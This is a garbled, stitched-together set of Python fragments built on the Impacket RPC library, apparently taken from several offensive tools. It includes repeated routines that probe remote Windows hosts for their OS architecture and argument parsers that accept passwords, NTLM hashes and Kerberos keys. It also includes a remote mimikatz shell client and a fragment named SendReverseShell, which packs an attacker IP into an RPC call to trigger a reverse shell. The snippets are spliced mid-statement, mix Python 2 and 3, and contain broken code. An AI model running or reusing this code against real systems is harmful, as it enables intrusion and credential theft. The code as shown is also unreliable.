def run(self):
if self.__options.targets is not None:
for line in self.__options.targets.readlines():
self.__machinesList.append(line.strip(' \r\n'))
else:
self.__machinesList.append(self.__options.target)
logging.info('Gathering OS architecture for %d machines' % len(self.__machinesList))
logging.info('Socket connect timeout set to %s secs' % self.__options.timeout)
for machine in self.__machinesList:
try:
stringBinding = r'ncacn_ip_tcp:%s[135]' % machine
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(int(self.__options.timeout))
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=self.NDR64Syntax)
except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
print('%s is 32-bit' % machine)
else:
logging.error(str(e))
pass
else:
print('%s is 64-bit' % machine)
dce.disconnect()
except Exception as e:
#import traceback
#traceback.print_exc()
logging.error('%s: %s' % (machine, str(e)))
def run(self):
if self.__options.targets is not None:
for line in self.__options.targets.readlines():
self.__machinesList.append(line.strip(' \r\n'))
else:
self.__machinesList.append(self.__options.target)
logging.info('Gathering OS architecture for %d machines' % len(self.__machinesList))
logging.info('Socket connect timeout set to %s secs' % self.__options.timeout)
for machine in self.__machinesList:
try:
stringBinding = r'ncacn_ip_tcp:%s[135]' % machine
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(int(self.__options.timeout))
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=self.NDR64Syntax)
except DCERPCException, e:
if str(e).find('syntaxes_not_supported') >= 0:
print '%s is 32-bit' % machine
else:
logging.error(str(e))
pass
else:
print '%s is 64-bit' % machine
dce.disconnect()
def get_arch(self):
options = Namespace()
options.target = self.target
NDR64Syntax = ("71710533-BEBA-4937-8319-B5DBEF9CCC36", "1.0")
try:
stringBinding = r"ncacn_ip_tcp:%s[135]" % self.target
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(2)
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=NDR64Syntax)
except DCERPCException as e:
if str(e).find("syntaxes_not_supported") >= 0:
return 32
else:
print(str(e))
pass
else:
return 64
dce.disconnect()
except Exception as e:
print(f"{self.target}, {str(e)}")
print(f"Failed to determine {self.target} architecture")
print("Attempt to proceed with 32 bit procdump")
return 32
def DCE(transport, timeout=2):
try:
t = DCERPCTransportFactory(transport)
t.set_connect_timeout(int(timeout))
d = t.get_dce_rpc()
d.connect()
return d
except Exception, e:
print('%s: %s' % (transport, str(e)))
def connect(username, password, domain, lmhash, nthash, address, port):
stringbinding = epm.hept_map(address,
par.MSRPC_UUID_PAR,
protocol='ncacn_ip_tcp')
rpctransport = DCERPCTransportFactory(stringbinding)
rpctransport.set_credentials(username, password, domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.set_auth_level(rpcrt.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(par.MSRPC_UUID_PAR,
transfer_syntax=('8A885D04-1CEB-11C9-9FE8-08002B104860', '2.0'))
return dce
def get_os_arch(self):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(
MSRPC_UUID_PORTMAP,
transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36',
'1.0'))
except (DCERPCException, e):
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug('Error retrieving os arch of {}: {}'.format(
self.host, str(e)))
return 0
def get_os_arch(self):
# Credit: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
# Credit: https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_19/examples/getArch.py
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except:
return 0
def get_os_arch(target):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(target)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP,
transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36',
'1.0'))
except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
return 32
else:
pass
else:
return 64
dce.disconnect()
except Exception as e:
logging.warning('%sErr with get_os_arch for %s: %s' %
(warningRed, target, str(e)))
def main():
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
'the target parameter')
group.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name and you cannot resolve it')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
domain, username, password, address = parse_target(options.target)
if options.target_ip is None:
options.target_ip = address
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:"******"Executing commands from %s" % options.file.name)
for line in options.file.readlines():
if line[0] != '#':
print("# %s" % line, end=' ')
shell.onecmd(line)
else:
print(line, end=' ')
else:
shell.cmdloop()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
def main():
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in '
'the target parameter')
group.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If ommited it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name and you cannot resolve it')
group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
help='Destination port to connect to SMB Server')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if options.target_ip is None:
options.target_ip = address
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:"******"Executing commands from %s" % options.file.name)
for line in options.file.readlines():
if line[0] != '#':
print "# %s" % line,
shell.onecmd(line)
else:
print line,
else:
shell.cmdloop()
except Exception, e:
#import traceback
#print traceback.print_exc()
logging.error(str(e))
except Exception, e:
if str(e).find('ept_s_not_registered') >= 0:
# Let's try ncacn_ip_tcp
stringBinding = epm.hept_map(address,
mimilib.MSRPC_UUID_MIMIKATZ,
protocol='ncacn_ip_tcp')
else:
raise
else:
stringBinding = epm.hept_map(address,
mimilib.MSRPC_UUID_MIMIKATZ,
protocol='ncacn_ip_tcp')
if bound is False:
rpctransport = DCERPCTransportFactory(stringBinding)
rpctransport.set_credentials(username, password, domain, lmhash,
nthash, options.aesKey)
dce = rpctransport.get_dce_rpc()
if options.k is True:
rpctransport.set_kerberos(True, options.dc_ip)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
rpctransport.set_credentials(username, password, domain, lmhash,
nthash)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(mimilib.MSRPC_UUID_MIMIKATZ)
shell = MimikatzShell(dce)
if options.file is not None:
def main():
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
'the target parameter')
group.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name and you cannot resolve it')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if options.target_ip is None:
options.target_ip = address
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:"******"Executing commands from %s" % options.file.name)
for line in options.file.readlines():
if line[0] != '#':
print("# %s" % line, end=' ')
shell.onecmd(line)
else:
print(line, end=' ')
else:
shell.cmdloop()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
format_ip = f"<{len(lip) + 1}s"
structure = (
# Yeah f**k this x)
('unknown', '<12s'),
# <(Size of ip address + \x00)s
('ip_address', format_ip),
# <5 - (Size of len(port)xh
('port', "<xxxi")
)
# Create the string binding
stringBinding = r'ncacn_ip_tcp:{}[{}]'.format(target_ip, port)
# Connect to the remote endpoint
transport = DCERPCTransportFactory(stringBinding)
dce = transport.get_dce_rpc()
dce.connect()
print("[*] Connected to the remote target")
# Casts the UUID string and version of the interface into a UUID object
interface_uuid = uuidtup_to_bin(("AB4ED934-1293-10DE-BC12-AE18C48DEF33", "1.0"))
# Binds to the interface
dce.bind(interface_uuid)
print("[*] Binded to AB4ED934-1293-10DE-BC12-AE18C48DEF33")
print("[*] Formatting the client stub")
# Create the client stub and pack its data so it valid
query = SendReverseShell()
query['unknown'] = '\x0d\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00'
query['ip_address'] = f"{lip}\x00"
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(mimilib.MSRPC_UUID_MIMIKATZ)
bound = True
except Exception, e:
if str(e).find('ept_s_not_registered') >=0:
# Let's try ncacn_ip_tcp
stringBinding = epm.hept_map(address, mimilib.MSRPC_UUID_MIMIKATZ, protocol = 'ncacn_ip_tcp')
else:
raise
else:
stringBinding = epm.hept_map(address, mimilib.MSRPC_UUID_MIMIKATZ, protocol = 'ncacn_ip_tcp')
if bound is False:
rpctransport = DCERPCTransportFactory(stringBinding)
rpctransport.set_credentials(username, password, domain, lmhash, nthash, options.aesKey)
dce = rpctransport.get_dce_rpc()
if options.k is True:
rpctransport.set_kerberos(True, options.dc_ip)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
rpctransport.set_credentials(username, password, domain, lmhash, nthash)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(mimilib.MSRPC_UUID_MIMIKATZ)
shell = MimikatzShell(dce)
if options.file is not None:
logging.info("Executing commands from %s" % options.file.name)
for line in options.file.readlines():